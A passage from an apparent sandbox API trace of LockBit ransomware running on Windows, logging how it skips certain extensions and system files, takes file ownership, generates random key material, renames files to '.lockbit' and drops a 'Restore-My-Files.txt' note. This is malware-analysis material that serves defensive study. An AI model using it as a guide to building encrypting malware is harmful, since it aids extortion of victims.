(hObject=0x3ac) returned 1 [0085.291] free (_Block=0x77d800) [0085.291] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\1047x576black.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\push\\1047x576black.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3ac [0085.291] CreateIoCompletionPort (FileHandle=0x3ac, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0085.291] malloc (_Size=0x40068) returned 0x3e30078 [0085.291] GetFileSizeEx (in: hFile=0x3ac, lpFileSize=0x3e30090 | out: lpFileSize=0x3e30090*=4570) returned 1 [0085.291] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0085.292] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0085.292] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e700ac, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e700ac) returned 0x0 [0085.292] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0085.292] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0085.292] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e700bc, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e700bc) returned 0x0 [0085.292] ReadFile (in: hFile=0x3ac, lpBuffer=0x3e300ac, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e30078 | out: lpBuffer=0x3e300ac*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e30078) returned 1 [0085.299] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\1047x576black.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\1047x576black.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0085.299] malloc (_Size=0xac) returned 0x77d800 [0085.299] NtSetInformationFile (FileHandle=0x3ac, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d800, Length=0xac, FileInformationClass=0xa) returned 0x0 [0085.300] free (_Block=0x77d800) [0085.300] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\1047x576black.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push") returned 1 [0085.300] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\Restore-My-Files.txt") returned 70 [0085.300] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\push\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3b8 [0085.301] CreateIoCompletionPort (FileHandle=0x3b8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0085.301] malloc (_Size=0x40068) returned 0x1fb18c0 [0085.301] WriteFile (in: hFile=0x3b8, lpBuffer=0x1fa30f8*, nNumberOfBytesToWrite=0x472, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fa30f8*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0085.302] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f316407, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f316407, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ee26b73, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x11da, dwReserved0=0x0, dwReserved1=0x0, cFileName="1047_576black.png", cAlternateFileName="")) returned 1 [0085.302] lstrcmpiW (lpString1=".", lpString2="1047_576black.png") returned -1 [0085.302] lstrcmpiW (lpString1="..", lpString2="1047_576black.png") returned -1 [0085.302] PathFindExtensionW (pszPath="1047_576black.png") returned=".png" [0085.302] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0085.303] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0085.303] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0085.303] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0085.303] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0085.303] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0085.303] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0085.303] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0085.303] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0085.303] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0085.303] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0085.303] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0085.303] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0085.303] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0085.303] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0085.303] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0085.303] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0085.303] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0085.303] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0085.303] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0085.304] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0085.304] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0085.304] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0085.304] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0085.304] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0085.304] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0085.304] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0085.305] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0085.305] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0085.305] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0085.305] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0085.305] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0085.305] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0085.305] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0085.305] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0085.305] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0085.305] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0085.305] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0085.305] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0085.305] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0085.305] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0085.305] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0085.305] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0085.305] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0085.306] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0085.306] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0085.306] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0085.306] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="1047_576black.png") returned 1 [0085.306] lstrcmpiW (lpString1="ntldr", lpString2="1047_576black.png") returned 1 [0085.306] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="1047_576black.png") returned 1 [0085.306] lstrcmpiW (lpString1="bootsect.bak", lpString2="1047_576black.png") returned 1 [0085.306] lstrcmpiW (lpString1="autorun.inf", lpString2="1047_576black.png") returned 1 [0085.306] lstrcmpiW (lpString1="thumbs.db", lpString2="1047_576black.png") returned 1 [0085.306] lstrcmpiW (lpString1="iconcache.db", lpString2="1047_576black.png") returned 1 [0085.306] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\") returned="" [0085.306] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\1047_576black.png") returned=".png" [0085.306] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0085.306] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0085.306] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0085.306] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0085.306] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0085.307] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0085.307] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0085.307] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0085.307] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0085.307] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0085.307] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0085.307] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0085.307] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0085.307] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0085.307] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0085.307] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0085.307] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0085.307] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0085.307] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0085.307] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0085.307] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0085.307] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0085.307] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0085.307] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0085.307] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0085.307] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0085.308] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0085.308] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0085.308] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\1047_576black.png.lockbit") returned 75 [0085.308] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\1047_576black.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\push\\1047_576black.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0085.308] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0085.309] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0085.309] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0085.309] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0085.309] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0085.309] RtlFreeAnsiString (AnsiString="\\") [0085.309] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3b4) returned 0x0 [0085.309] malloc (_Size=0x200) returned 0x77d800 [0085.309] NtQueryInformationToken (in: TokenHandle=0x3b4, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0085.309] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0085.309] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0085.310] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\1047_576black.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0085.310] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\1047_576black.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0085.310] CloseHandle (hObject=0x3b4) returned 1 [0085.310] free (_Block=0x77d800) [0085.310] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\1047_576black.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\push\\1047_576black.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3b4 [0085.310] CreateIoCompletionPort (FileHandle=0x3b4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0085.311] malloc (_Size=0x40068) returned 0x2031ed0 [0085.312] GetFileSizeEx (in: hFile=0x3b4, lpFileSize=0x2031ee8 | out: lpFileSize=0x2031ee8*=4570) returned 1 [0085.312] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0085.312] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0085.312] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2071f04, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2071f04) returned 0x0 [0085.312] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0085.313] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0085.313] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2071f14, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2071f14) returned 0x0 [0085.313] ReadFile (in: hFile=0x3b4, lpBuffer=0x2031f04, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x2031ed0 | out: lpBuffer=0x2031f04*, lpNumberOfBytesRead=0x0, lpOverlapped=0x2031ed0) returned 1 [0085.318] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\1047_576black.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\1047_576black.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0085.318] malloc (_Size=0xac) returned 0x77d800 [0085.318] NtSetInformationFile (FileHandle=0x3b4, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d800, Length=0xac, FileInformationClass=0xa) returned 0x0 [0085.318] free (_Block=0x77d800) [0085.318] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\1047_576black.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push") returned 1 [0085.319] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\Restore-My-Files.txt") returned 70 [0085.319] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\push\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0085.319] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f3626c1, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f3626c1, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ee26b73, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x13e0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NavigationLeft_ButtonGraphic.png", cAlternateFileName="")) returned 1 [0085.319] lstrcmpiW (lpString1=".", lpString2="NavigationLeft_ButtonGraphic.png") returned -1 [0085.319] lstrcmpiW (lpString1="..", lpString2="NavigationLeft_ButtonGraphic.png") returned -1 [0085.319] PathFindExtensionW (pszPath="NavigationLeft_ButtonGraphic.png") returned=".png" [0085.319] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0085.319] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0085.319] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0085.319] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0085.319] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0085.319] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0085.319] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0085.319] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0085.319] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0085.319] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0085.319] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0085.319] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0085.319] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0085.320] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0085.320] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0085.320] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0085.320] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0085.320] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0085.320] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0085.320] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0085.320] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0085.320] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0085.320] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0085.320] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0085.320] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0085.320] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0085.320] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0085.320] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0085.320] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0085.320] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0085.320] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0085.320] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0085.320] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0085.320] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0085.320] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0085.321] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0085.321] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0085.321] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0085.321] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0085.321] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0085.321] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0085.321] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0085.321] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0085.321] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0085.321] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0085.321] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0085.321] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0085.321] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NavigationLeft_ButtonGraphic.png") returned 1 [0085.321] lstrcmpiW (lpString1="ntldr", lpString2="NavigationLeft_ButtonGraphic.png") returned 1 [0085.321] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NavigationLeft_ButtonGraphic.png") returned 1 [0085.321] lstrcmpiW (lpString1="bootsect.bak", lpString2="NavigationLeft_ButtonGraphic.png") returned -1 [0085.321] lstrcmpiW (lpString1="autorun.inf", lpString2="NavigationLeft_ButtonGraphic.png") returned -1 [0085.321] lstrcmpiW (lpString1="thumbs.db", lpString2="NavigationLeft_ButtonGraphic.png") returned 1 [0085.321] lstrcmpiW (lpString1="iconcache.db", lpString2="NavigationLeft_ButtonGraphic.png") returned -1 [0085.321] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\") returned="" [0085.321] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\NavigationLeft_ButtonGraphic.png") returned=".png" [0085.321] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0085.322] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0085.322] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0085.322] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0085.322] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0085.322] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0085.322] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0085.322] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0085.322] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0085.322] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0085.322] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0085.322] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0085.322] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0085.322] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0085.322] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0085.322] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0085.322] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0085.322] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0085.322] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0085.322] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0085.322] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0085.323] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0085.323] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0085.323] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0085.323] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0085.323] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0085.323] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0085.323] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0085.323] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\NavigationLeft_ButtonGraphic.png.lockbit") returned 90 [0085.323] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\NavigationLeft_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\push\\navigationleft_buttongraphic.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0085.324] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0085.324] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0085.324] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0085.324] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0085.325] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0085.325] RtlFreeAnsiString (AnsiString="\\") [0085.325] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3b8) returned 0x0 [0085.325] malloc (_Size=0x200) returned 0x77d800 [0085.325] NtQueryInformationToken (in: TokenHandle=0x3b8, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0085.325] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0085.325] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0085.325] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\NavigationLeft_ButtonGraphic.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0085.326] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\NavigationLeft_ButtonGraphic.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0085.326] CloseHandle (hObject=0x3b8) returned 1 [0085.326] free (_Block=0x77d800) [0085.326] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\NavigationLeft_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\push\\navigationleft_buttongraphic.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3b8 [0085.326] CreateIoCompletionPort (FileHandle=0x3b8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0085.326] malloc (_Size=0x40068) returned 0x1ff1e60 [0085.326] GetFileSizeEx (in: hFile=0x3b8, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=5088) returned 1 [0085.327] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0085.327] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0085.327] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0085.327] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0085.328] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0085.328] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0085.328] ReadFile (in: hFile=0x3b8, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, 